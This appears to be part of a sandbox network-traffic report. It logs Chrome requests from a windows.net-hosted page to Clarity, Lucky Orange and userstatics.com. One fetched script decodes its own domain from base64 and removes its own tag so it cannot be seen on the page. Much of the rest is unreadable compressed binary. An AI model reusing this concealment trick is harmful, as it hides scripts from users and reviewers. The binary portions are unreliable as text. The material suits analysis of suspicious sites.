                                                        2024-11-28 12:34:49 UTC707INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 61 2c 72 2c 69 2c 74 2c 79 29 7b 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 28 29 7b 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 63 2e 67 69 66 22 7d 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 73 79 6e 63 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 73 79 6e 63 29 3b 69 66 28 61 5b 63 5d 2e 76 7c 7c 61 5b 63 5d 2e 74 29 72 65 74 75 72 6e 20 61 5b 63 5d 28 22 65 76 65 6e 74 22 2c 63 2c 22 64 75 70 2e 22 2b 69 2e 70 72 6f 6a 65 63 74 49 64 29 3b 61 5b 63 5d 2e 74 3d 21 30 2c 28 74 3d 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 29 29 2e
                                                        Data Ascii: !function(c,l,a,r,i,t,y){function sync(){(new Image).src="https://c.clarity.ms/c.gif"}"complete"==document.readyState?sync():window.addEventListener("load",sync);if(a[c].v||a[c].t)return a[c]("event",c,"dup."+i.projectId);a[c].t=!0,(t=l.createElement(r)).


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.44977934.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:48 UTC650OUTGET /f6f3e602 HTTP/1.1
                                                        Host: settings.luckyorange.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        x-lucky-referrer:
                                                        sec-ch-ua-mobile: ?0
                                                        x-lucky-uid: undefined
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://ddbsodvnnadewe.z1.web.core.windows.net/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:51 UTC358INHTTP/1.1 200 OK
                                                        Access-Control-Allow-Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Access-Control-Allow-Credentials: true
                                                        Content-Type: application/json; charset=utf-8
                                                        Content-Length: 4042
                                                        Vary: Accept-Encoding
                                                        Date: Thu, 28 Nov 2024 12:34:50 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-11-28 12:34:51 UTC1032INData Raw: 7b 22 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 73 22 3a 5b 5d 2c 22 65 76 65 6e 74 52 75 6c 65 73 22 3a 5b 5d 2c 22 66 65 61 74 75 72 65 73 22 3a 7b 22 72 65 76 65 72 74 62 61 63 6b 22 3a 74 72 75 65 2c 22 63 68 61 74 2e 70 72 65 51 75 61 6c 69 66 69 63 61 74 69 6f 6e 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 22 3a 66 61 6c 73 65 2c 22 73 75 72 76 65 79 73 2e 6c 6f 6e 67 54 65 78 74 22 3a 74 72 75 65 2c 22 73 63 72 61 6d 62 6c 65 22 3a 74 72 75 65 2c 22 66 75 6e 6e 65 6c 73 2e 76 69 73 69 74 6f 72 73 22 3a 74 72 75 65 2c 22 67 63 73 22 3a 74 72 75 65 2c 22 72 65 71 75 69 72 65 43 6f 6e 73 65 6e 74 53 65 74 74 69 6e 67 22 3a 74 72 75 65 2c 22 6b 65 79 2d 65 76 65 6e 74 73 22 3a 74 72 75 65 2c 22 62 69 67 63 6f 6d 6d 65 72 63 65 2d 6e 65 77 2d 61 70 70
                                                        Data Ascii: {"announcements":[],"eventRules":[],"features":{"revertback":true,"chat.preQualification":true,"messenger":false,"surveys.longText":true,"scramble":true,"funnels.visitors":true,"gcs":true,"requireConsentSetting":true,"key-events":true,"bigcommerce-new-app
                                                        2024-11-28 12:34:51 UTC1390INData Raw: 2d 61 6c 6c 6f 77 65 64 22 3a 74 72 75 65 7d 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 22 69 6e 74 65 67 72 61 74 69 6f 6e 73 22 3a 5b 5d 2c 22 69 6e 76 69 74 65 73 22 3a 5b 5d 2c 22 73 69 74 65 22 3a 7b 22 61 64 76 61 6e 63 65 64 22 3a 7b 22 63 6f 6e 76 65 72 73 69 6f 6e 4d 65 74 72 69 63 22 3a 7b 22 61 63 74 69 76 65 22 3a 66 61 6c 73 65 2c 22 6d 65 74 72 69 63 22 3a 22 22 7d 2c 22 61 76 65 72 61 67 65 43 6f 6e 76 65 72 73 69 6f 6e 22 3a 7b 22 61 63 74 69 76 65 22 3a 66 61 6c 73 65 2c 22 76 61 6c 75 65 22 3a 30 2c 22 63 75 72 72 65 6e 63 79 22 3a 22 55 53 44 22 2c 22 69 73 4c 69 66 65 74 69 6d 65 22 3a 66 61 6c 73 65 7d 2c 22 68 61 73 68 65 64 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 6c 6f 61 64 4d 65 74 68 6f 64 22 3a 22 6f 6e 6c
                                                        Data Ascii: -allowed":true},"ip":"8.46.123.228","integrations":[],"invites":[],"site":{"advanced":{"conversionMetric":{"active":false,"metric":""},"averageConversion":{"active":false,"value":0,"currency":"USD","isLifetime":false},"hashedPages":false,"loadMethod":"onl
                                                        2024-11-28 12:34:51 UTC1362INData Raw: 22 6c 61 62 65 6c 22 3a 22 43 68 6f 6f 73 65 20 61 20 74 65 61 6d 22 7d 2c 22 70 72 65 51 75 61 6c 69 66 69 63 61 74 69 6f 6e 22 3a 7b 22 61 63 74 69 76 65 22 3a 74 72 75 65 2c 22 6e 61 6d 65 22 3a 7b 22 61 63 74 69 76 65 22 3a 74 72 75 65 2c 22 6c 61 62 65 6c 22 3a 22 59 6f 75 72 20 66 69 72 73 74 20 6e 61 6d 65 22 7d 2c 22 63 6f 6e 74 61 63 74 22 3a 7b 22 61 63 74 69 76 65 22 3a 74 72 75 65 2c 22 6c 61 62 65 6c 22 3a 22 59 6f 75 72 20 65 6d 61 69 6c 22 7d 2c 22 71 75 65 73 74 69 6f 6e 22 3a 7b 22 61 63 74 69 76 65 22 3a 66 61 6c 73 65 2c 22 6c 61 62 65 6c 22 3a 22 51 75 65 73 74 69 6f 6e 2f 43 6f 6d 6d 65 6e 74 22 7d 7d 7d 7d 2c 22 73 74 79 6c 65 73 22 3a 7b 22 61 63 63 65 6e 74 43 6f 6c 6f 72 22 3a 22 33 46 35 32 46 41 22 2c 22 61 63 63 65 6e 74 43 6f
                                                        Data Ascii: "label":"Choose a team"},"preQualification":{"active":true,"name":{"active":true,"label":"Your first name"},"contact":{"active":true,"label":"Your email"},"question":{"active":false,"label":"Question/Comment"}}}},"styles":{"accentColor":"3F52FA","accentCo
                                                        2024-11-28 12:34:51 UTC258INData Raw: 42 75 63 6b 65 74 22 3a 22 74 72 75 65 22 7d 2c 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 37 33 32 37 39 37 32 39 30 38 39 37 2c 22 73 75 72 76 65 79 73 22 3a 5b 5d 2c 22 74 65 61 6d 73 22 3a 5b 5d 2c 22 75 73 65 72 73 22 3a 5b 7b 22 69 64 22 3a 22 66 32 37 32 66 33 37 31 22 2c 22 64 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 6d 61 74 74 68 65 77 66 75 6c 6c 65 72 72 22 7d 5d 2c 22 76 69 73 69 74 6f 72 22 3a 7b 22 62 6f 74 22 3a 66 61 6c 73 65 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 6e 61 6d 65 22 3a 22 43 68 72 6f 6d 65 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 31 37 2e 30 2e 30 2e 30 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 74 79 70 65 22 3a 22 64 65 73 6b 74 6f 70 22 7d 7d 2c 22 77 68 69 74 65 4c 61 62 65 6c 22 3a 7b 22 61 63 74 69 76 65 22 3a 66 61 6c 73
                                                        Data Ascii: Bucket":"true"},"serverTime":1732797290897,"surveys":[],"teams":[],"users":[{"id":"f272f371","displayName":"matthewfullerr"}],"visitor":{"bot":false,"browser":{"name":"Chrome","version":"117.0.0.0"},"device":{"type":"desktop"}},"whiteLabel":{"active":fals


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449792104.21.53.384435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:49 UTC484OUTGET /get/script.js?referrer=https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE HTTP/1.1
                                                        Host: userstatics.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:50 UTC824INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:34:50 GMT
                                                        Content-Type: text/javascript; charset=utf-8
                                                        Content-Length: 133
                                                        Connection: close
                                                        X-Powered-By: PHP/8.2.1
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mZHjjeJn3EYO3%2FogZY5aH%2FFA0kQoFDhy53RxrsSmGzIOXrY%2BP%2B5uSBqJ%2FuFPSAqFfKBgwHOIcuPYXXxOZxnfXhbwAm2wfhZ6cWdw0Et3%2F86LAl%2F5j2mJp7AHe%2BqoQl7b%2FxU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8e9a64f7bd424326-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1571&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1062&delivery_rate=1793611&cwnd=178&unsent_bytes=0&cid=3f24933ac23459a0&ts=543&x=0"
                                                        2024-11-28 12:34:50 UTC133INData Raw: 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 6e 65 77 20 52 65 67 45 78 70 28 61 74 6f 62 28 22 64 58 4e 6c 63 6e 4e 30 59 58 52 70 59 33 4d 75 59 32 39 74 22 29 29 2e 74 65 73 74 28 65 2e 73 72 63 29 26 26 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 29 3b
                                                        Data Ascii: document.querySelectorAll("script").forEach(e=>{new RegExp(atob("dXNlcnN0YXRpY3MuY29t")).test(e.src)&&document.body.removeChild(e)});


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.44980334.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:53 UTC356OUTGET /f6f3e602 HTTP/1.1
                                                        Host: settings.luckyorange.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:54 UTC241INHTTP/1.1 200 OK
                                                        Content-Type: application/json; charset=utf-8
                                                        Content-Length: 4042
                                                        Vary: Accept-Encoding
                                                        Date: Thu, 28 Nov 2024 12:34:54 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-11-28 12:34:54 UTC1390INData Raw: 7b 22 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 73 22 3a 5b 5d 2c 22 65 76 65 6e 74 52 75 6c 65 73 22 3a 5b 5d 2c 22 66 65 61 74 75 72 65 73 22 3a 7b 22 72 65 76 65 72 74 62 61 63 6b 22 3a 74 72 75 65 2c 22 63 68 61 74 2e 70 72 65 51 75 61 6c 69 66 69 63 61 74 69 6f 6e 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 22 3a 66 61 6c 73 65 2c 22 73 75 72 76 65 79 73 2e 6c 6f 6e 67 54 65 78 74 22 3a 74 72 75 65 2c 22 73 63 72 61 6d 62 6c 65 22 3a 74 72 75 65 2c 22 66 75 6e 6e 65 6c 73 2e 76 69 73 69 74 6f 72 73 22 3a 74 72 75 65 2c 22 67 63 73 22 3a 74 72 75 65 2c 22 72 65 71 75 69 72 65 43 6f 6e 73 65 6e 74 53 65 74 74 69 6e 67 22 3a 74 72 75 65 2c 22 6b 65 79 2d 65 76 65 6e 74 73 22 3a 74 72 75 65 2c 22 62 69 67 63 6f 6d 6d 65 72 63 65 2d 6e 65 77 2d 61 70 70
                                                        Data Ascii: {"announcements":[],"eventRules":[],"features":{"revertback":true,"chat.preQualification":true,"messenger":false,"surveys.longText":true,"scramble":true,"funnels.visitors":true,"gcs":true,"requireConsentSetting":true,"key-events":true,"bigcommerce-new-app
                                                        2024-11-28 12:34:54 UTC1390INData Raw: 65 65 74 69 6e 67 22 3a 7b 22 61 63 74 69 76 65 22 3a 66 61 6c 73 65 2c 22 69 63 6f 6e 22 3a 22 75 73 65 72 22 2c 22 68 65 61 64 6c 69 6e 65 22 3a 22 57 65 6c 63 6f 6d 65 20 74 6f 20 6e 75 74 72 69 6a 6f 75 72 6e 65 79 21 22 2c 22 73 75 62 48 65 61 64 69 6e 67 22 3a 22 4c 65 74 20 75 73 20 6b 6e 6f 77 20 69 66 20 79 6f 75 20 68 61 76 65 20 61 6e 79 20 71 75 65 73 74 69 6f 6e 73 2e 22 7d 2c 22 69 6e 74 72 6f 64 75 63 74 69 6f 6e 22 3a 7b 22 61 63 74 69 76 65 22 3a 66 61 6c 73 65 2c 22 6d 65 73 73 61 67 65 22 3a 22 48 65 6c 6c 6f 21 20 45 6e 74 65 72 20 79 6f 75 72 20 71 75 65 73 74 69 6f 6e 2f 63 6f 6d 6d 65 6e 74 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 27 6c 6c 20 66 69 6e 64 20 74 68 65 20 72 69 67 68 74 20 70 65 72 73 6f 6e 20 74 6f 20 68 65 6c 70 20 79
                                                        Data Ascii: eeting":{"active":false,"icon":"user","headline":"Welcome to nutrijourney!","subHeading":"Let us know if you have any questions."},"introduction":{"active":false,"message":"Hello! Enter your question/comment below and we'll find the right person to help y
                                                        2024-11-28 12:34:54 UTC1262INData Raw: 43 6f 6c 6f 72 22 3a 22 64 65 66 61 75 6c 74 22 7d 2c 22 70 65 72 73 6f 6e 61 6c 22 3a 7b 22 68 65 61 64 65 72 49 6d 61 67 65 22 3a 22 70 72 6f 66 69 6c 65 50 68 6f 74 6f 22 2c 22 74 69 74 6c 65 22 3a 22 6d 79 54 69 74 6c 65 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 64 65 66 61 75 6c 74 22 7d 2c 22 6c 61 75 6e 63 68 65 72 22 3a 7b 22 61 63 74 69 76 65 22 3a 66 61 6c 73 65 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 72 69 67 68 74 22 2c 22 64 69 73 70 6c 61 79 4d 6f 64 65 22 3a 22 61 6c 77 61 79 73 22 2c 22 6d 69 6e 69 43 68 61 74 4c 61 62 65 6c 22 3a 22 43 68 61 74 22 2c 22 74 79 70 65 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 70 61 64 64 69 6e 67 22 3a 7b 22 74 6f 70 22 3a 22 30 70 78 22 2c 22 72 69 67 68 74 22 3a 22 32 30 70 78 22 2c 22 62
                                                        Data Ascii: Color":"default"},"personal":{"headerImage":"profilePhoto","title":"myTitle","backgroundColor":"default"},"launcher":{"active":false,"position":"right","displayMode":"always","miniChatLabel":"Chat","type":"default","padding":{"top":"0px","right":"20px","b


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449799108.158.75.104435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:54 UTC560OUTGET /core/core.js?v=49d958c HTTP/1.1
                                                        Host: tools.luckyorange.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: script
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:55 UTC697INHTTP/1.1 200 OK
                                                        Content-Type: text/javascript
                                                        Content-Length: 65516
                                                        Connection: close
                                                        Date: Thu, 28 Nov 2024 12:34:56 GMT
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, HEAD
                                                        Last-Modified: Wed, 06 Nov 2024 20:50:23 GMT
                                                        ETag: "ceb76217aaf3b7ca62d964b6ad16fab3"
                                                        x-amz-server-side-encryption: AES256
                                                        Cache-Control: max-age=31536000
                                                        Content-Encoding: gzip
                                                        Accept-Ranges: bytes
                                                        Server: AmazonS3
                                                        Vary: Origin,Access-Control-Request-Headers,Access-Control-Request-Method
                                                        X-Cache: Miss from cloudfront
                                                        Via: 1.1 faeaaf5db340bc602fd96355e084d554.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: BAH53-P2
                                                        X-Amz-Cf-Id: 0tARvY1Z1aA9IgJLIAVe7jRwduViMmushmCRXFPVVKLK4FFeUZXFFQ==
                                                        2024-11-28 12:34:55 UTC14588INData Raw: 1f 8b 08 00 00 00 00 00 02 03 dc bd eb 9a db 46 b2 20 f8 2a 2c b4 0f 0d 88 59 28 b2 aa 74 03 05 71 65 49 ee 56 1f dd da 25 b7 cf 59 8a d6 a0 c0 64 11 16 08 d0 b8 54 a9 4c 72 3e cf ee ce 5e bf 6f 1f 60 ff ec fc 9d 5f fb 0e e7 4d c6 fb 22 1b 11 79 41 02 04 59 25 b7 ba bf 9d 71 b7 8a 40 22 af 91 99 91 11 91 71 b1 67 65 12 16 51 9a d8 9c 15 ce 6a 96 66 f6 65 90 75 92 4e 94 74 0a 87 8f 93 89 5f c0 9f 8d 63 17 f3 28 67 55 6e c8 2b 9f 3b 85 6d 96 64 29 8b a0 4c 7f c2 02 f8 19 4c 58 ee f7 59 e9 8f 27 c3 fc 51 e4 c6 3c b9 28 e6 c3 bc d7 73 52 3f 1a e7 13 f6 e6 fc 27 1e 16 ee 32 4b 8b b4 b8 5e 72 77 1e e4 6f ae 92 b7 59 ba e4 59 71 ed 86 41 1c db 19 4b 9d 6e 37 1b a7 93 6e b7 74 97 65 3e b7 f1 05 5a 71 18 3e f8 fd 21 76 80 ba 1d 38 b7 aa 32 60 09 54 69 d3 10 03 f8
                                                        Data Ascii: F *,Y(tqeIV%YdTLr>^o`_M"yAY%q@"qgeQjfeuNt_c(gUn+;md)LLXY'Q<(sR?'2K^rwoYYqAKn7nte>Zq>!v82`Ti
                                                        2024-11-28 12:34:55 UTC2211INData Raw: 25 2d 43 32 6a 2a c8 a8 25 d1 50 5a 00 02 1d 3e 7a 7f fe 5e c9 16 97 78 34 22 d6 86 f4 29 3c 42 d1 3f 58 bd a5 c3 2a 54 25 93 81 e6 5b 2a 09 60 85 35 f2 1e a2 0d 97 70 c6 5c 4b 78 e8 0e b5 29 ca de a9 8a 7c d2 ba c4 4e cc 25 76 32 f1 6a f7 df a9 2f 24 47 44 bc aa 9b d5 cc 30 6a cf bf b9 7e 27 a4 5e 32 58 c1 80 24 7d f5 45 56 dd a2 a7 3b 16 59 43 3e b5 57 90 36 b3 05 51 4d 97 e7 89 23 4e cb a4 e1 f0 5f ec b5 ea 86 a5 b1 71 52 97 64 ba d0 f5 1c 27 96 5e e0 33 2c e6 3e 46 56 50 ab 2a 78 94 0f 03 b5 aa 42 58 4e 01 91 f1 21 c9 bc e4 52 43 c2 27 94 7b f0 a0 ac 02 98 0b 71 35 de 56 f4 ca 9e 55 09 9b 6d ab 67 07 bd 01 3a 00 b4 86 5b bb 70 46 00 6a 81 50 dc 98 5c b5 f3 55 0d 18 c7 1a 26 0b d3 80 1f ac 71 d8 c6 fd c6 41 52 89 ea 04 60 30 e4 ae f6 54 07 fc 49 6a 8b
                                                        Data Ascii: %-C2j*%PZ>z^x4")<B?X*T%[*`5p\Kx)|N%v2j/$GD0j~'^2X$}EV;YC>W6QM#N_qRd'^3,>FVP*xBXN!RC'{q5VUmg:[pFjP\U&qAR`0TIj
                                                        2024-11-28 12:34:55 UTC16384INData Raw: 16 f0 42 d8 26 5d e2 cd e0 b5 78 3e c7 f5 7c e5 af 10 d5 99 2c e1 95 2b 81 29 d7 2a f4 6b 59 9e c7 51 3e df e5 ac 06 68 b2 65 dd 37 74 1e 15 fc 85 81 0a ae 5c a9 18 93 c3 1e c8 a9 5e e0 e0 46 b0 97 ae 64 bc 61 e9 70 80 6c 53 af 04 30 2d b9 07 2c b6 12 f5 01 d1 5e a4 cb 28 f4 38 93 6e 09 72 af 40 8f 83 3b ea 09 dd c0 cd 04 73 65 af 04 bf e9 59 6f df 9c bd b3 48 10 30 85 cf e8 1d 27 c7 c1 3c 4f a6 cb 34 4a 8a 27 3f 05 9f 18 b2 5a de de 46 85 eb 11 e8 65 2b 4c 16 dd ee 01 f0 6a c2 17 c3 16 3c d9 45 af 27 b5 80 1a ab 6b 0c a5 27 b8 95 af 00 8c 09 2a 13 f2 b7 01 15 1a 57 c0 b0 96 48 77 4c f0 96 2d bd 21 63 2a 33 ea 78 0c 12 b0 95 0b 55 a7 72 c7 8a 70 c7 0e c3 d9 a1 78 6d 58 a6 b0 44 ea 69 6d e7 4a bb b0 87 b0 f1 79 ed a6 13 19 06 3b 21 bb 03 29 79 c4 ef 08 c9
                                                        Data Ascii: B&]x>|,+)*kYQ>he7t\^FdaplS0-,^(8nr@;seYoH0'<O4J'?ZFe+Lj<E'k'*WHwL-!c*3xUrpxmXDimJy;!)y
                                                        2024-11-28 12:34:55 UTC1024INData Raw: 8a 82 32 3d 4c 03 a8 9f a6 0b 31 a1 22 19 87 25 18 66 2d c1 72 8d 7a a8 5a 55 f9 70 24 f9 79 2a 06 52 1c 79 8f a1 ab 64 81 78 b1 a0 4c 01 c2 ed c8 f1 e6 13 91 5b a6 36 2e 3c 0a b9 91 14 7b 34 a3 e6 1b 0c a0 e4 f3 b0 d9 8a 93 03 c1 ad c0 ff e1 97 73 67 af 8f db 4a eb 0c 40 4a c5 8e 92 3d b3 1a 25 9c 48 fe 41 de 43 28 a4 1f 3d 83 9b 32 92 59 61 d0 db 9c 5c e9 c1 a6 4a 93 e0 2e 8c e7 a9 4a c2 9a f3 69 f9 ea f3 ef 2a bf 11 13 99 33 d2 35 37 21 38 03 bf 85 72 9f 5c be cc cf 33 0a 55 47 b8 b4 d0 a7 33 da 57 67 34 da c2 cb e3 da 57 c7 35 fa ed 88 9f a5 83 3b c7 85 54 31 1a 49 cb 98 59 5c 4b 8a fe 15 26 0a dd 6f e4 83 23 f8 a4 31 6e 0f e0 4f f0 a6 9f e0 b8 d6 8c 4c 8b 45 a1 6e eb ec fc ef ef 07 78 72 e5 5e b4 ae e1 c0 4f cb 42 59 8a bc 40 2b f3 d2 27 b9 11 bf 75
                                                        Data Ascii: 2=L1"%f-rzZUp$y*RydxL[6.<{4sgJ@J=%HAC(=2Ya\J.Ji*357!8r\3UG3Wg4W5;T1IY\K&o#1nOLEnxr^OBY@+'u
                                                        2024-11-28 12:34:55 UTC16384INData Raw: 12 3c a5 59 42 09 84 4e c4 a3 09 e9 95 c9 c8 c0 cd 9a 5e 67 e9 2c 7b 86 f7 e3 34 0b 92 3a 86 47 b4 1a ed 13 57 b0 45 f8 fa 6a ea 67 76 c7 59 51 9f 45 ea 5c ce 6a de 52 91 aa 49 a8 a6 22 9c 70 e3 95 65 e8 30 45 f3 60 9d 00 e9 0f 47 a8 35 e0 84 48 3e b7 94 b8 21 53 b8 e6 5c 3c a9 41 42 e3 1d 12 cf 65 36 31 60 35 ea 6b 18 7a 5d 53 90 af 07 ef 37 0d 6a 98 e5 44 35 f3 a9 15 f2 76 9b 29 a3 8a 24 dd 98 19 b7 43 85 ae ab de 3c 66 2e 7c 86 45 2e 1e 58 6a 61 af 9c 4c ff 59 93 e9 e7 26 b3 6a 14 62 d4 1b 60 53 a8 91 0a e6 4e 90 2e 99 dc f2 91 84 39 ae 7c a6 25 0b ac a9 ef 56 91 3a 22 93 4f 75 20 7b 56 07 b2 ef ec 40 46 10 40 12 98 8e 7b 00 da 89 b3 22 d4 0b 7c 84 36 d3 46 c6 ff d6 ae 65 be bf a1 7b e4 7d 3f 26 ec 95 8c 3c 01 d5 c2 e9 65 18 fd 86 64 65 31 cd 0e fa 3c
                                                        Data Ascii: <YBN^g,{4:GWEjgvYQE\jRI"pe0E`G5H>!S\<ABe61`5kz]S7jD5v)$C<f.|E.XjaLY&jb`SN.9|%V:"Ou {V@F@{"|6Fe{}?&<ede1<
                                                        2024-11-28 12:34:55 UTC2754INData Raw: 08 4c 4e 23 76 95 42 e3 fb 34 17 52 aa 78 42 e3 51 90 94 4c 43 2d 63 33 a9 3b eb 3c fd 15 2b b7 8a 5a 8e 7a 51 4b fb 2d d7 9c b6 cd a4 4c de 9c e5 13 5f ad bf 73 96 bc 52 cd 61 5a 6a 53 ed 89 dc 9c 56 b5 ab f6 a2 1b 7d 8e db 84 d5 a1 7d 42 a4 fc 57 58 4e 65 77 d4 bc b8 99 7f 87 cb 4a 57 c9 ee 73 8f a3 91 42 53 2e 6a 57 da 95 73 8b 77 4c 72 e3 e9 db a8 ba 9c 8a c8 e0 98 4e cc 1b 9b 9b 9a d5 50 4e 2a 6e 52 f4 f4 99 70 72 50 b1 66 6e 46 fa a6 70 85 02 b3 ad 7c dc ee 38 5b 73 e7 d5 16 11 fc 8d f8 e6 9d 58 f3 df a1 2f be ab d7 17 df 95 f4 c5 bd 89 37 69 a5 71 92 e5 e2 a4 67 86 8d 8c 14 a5 36 b4 54 b5 34 6c 43 1e bc 36 3b 83 3a 04 a1 7d d8 3f eb 3d 70 a7 3d 04 d7 1b 3e 8c 1c 69 fe 89 c1 73 f2 f2 38 5f fc 03 71 ee 8e d9 63 59 15 50 b1 db 96 52 cb 58 d2 18 0e 24
                                                        Data Ascii: LN#vB4RxBQLC-c3;<+ZzQK-L_sRaZjSV}}BWXNewJWsBS.jWswLrNPN*nRprPfnFp|8[sX/7iqg6T4lC6;:}?=p=>is8_qcYPRX$
                                                        2024-11-28 12:34:55 UTC12171INData Raw: 7a 12 79 ac 6c cc 19 07 0c dc 7c b5 ba 6a 03 9f 9e 38 20 99 16 e8 93 f6 24 76 4d 03 78 b5 e5 f7 6c 90 f7 dc 67 01 c9 a2 e4 82 c2 96 f8 ae 6e 84 96 b3 cc 3a 0b 8a 93 f2 69 6f b5 27 be 14 a1 d1 08 d0 da 72 94 64 80 ce e7 32 c5 b8 a6 63 b7 c7 a7 12 33 36 d0 21 52 9b da 07 1d 30 5b d2 04 54 25 7d 90 c9 d6 5a 0e 69 75 f5 a6 1a 22 0d 10 76 56 81 cf 39 2b ed 05 af c9 10 38 6d 4b b0 b8 f5 c4 7d 12 cb 80 95 51 77 ed 22 54 59 b0 90 90 b7 83 4e eb 3a 9a 45 4b 17 4c ae 21 22 05 b4 16 ce dc cc 8d f3 b6 e9 3c 6f 9b f6 79 db c4 f3 c6 f2 a8 ce 60 10 b7 9b 76 91 72 8e f8 4b 39 27 da b1 a4 d0 fb 83 4e c3 2a 17 31 25 43 5e a9 2d 80 e4 f5 a5 57 7c 37 49 07 a3 09 20 57 df 5b f3 82 be 60 64 f7 90 1b e3 6c 0a c8 65 38 88 f3 21 a6 15 01 ae db 63 05 3f c3 21 22 aa 04 c4 96 97 e2
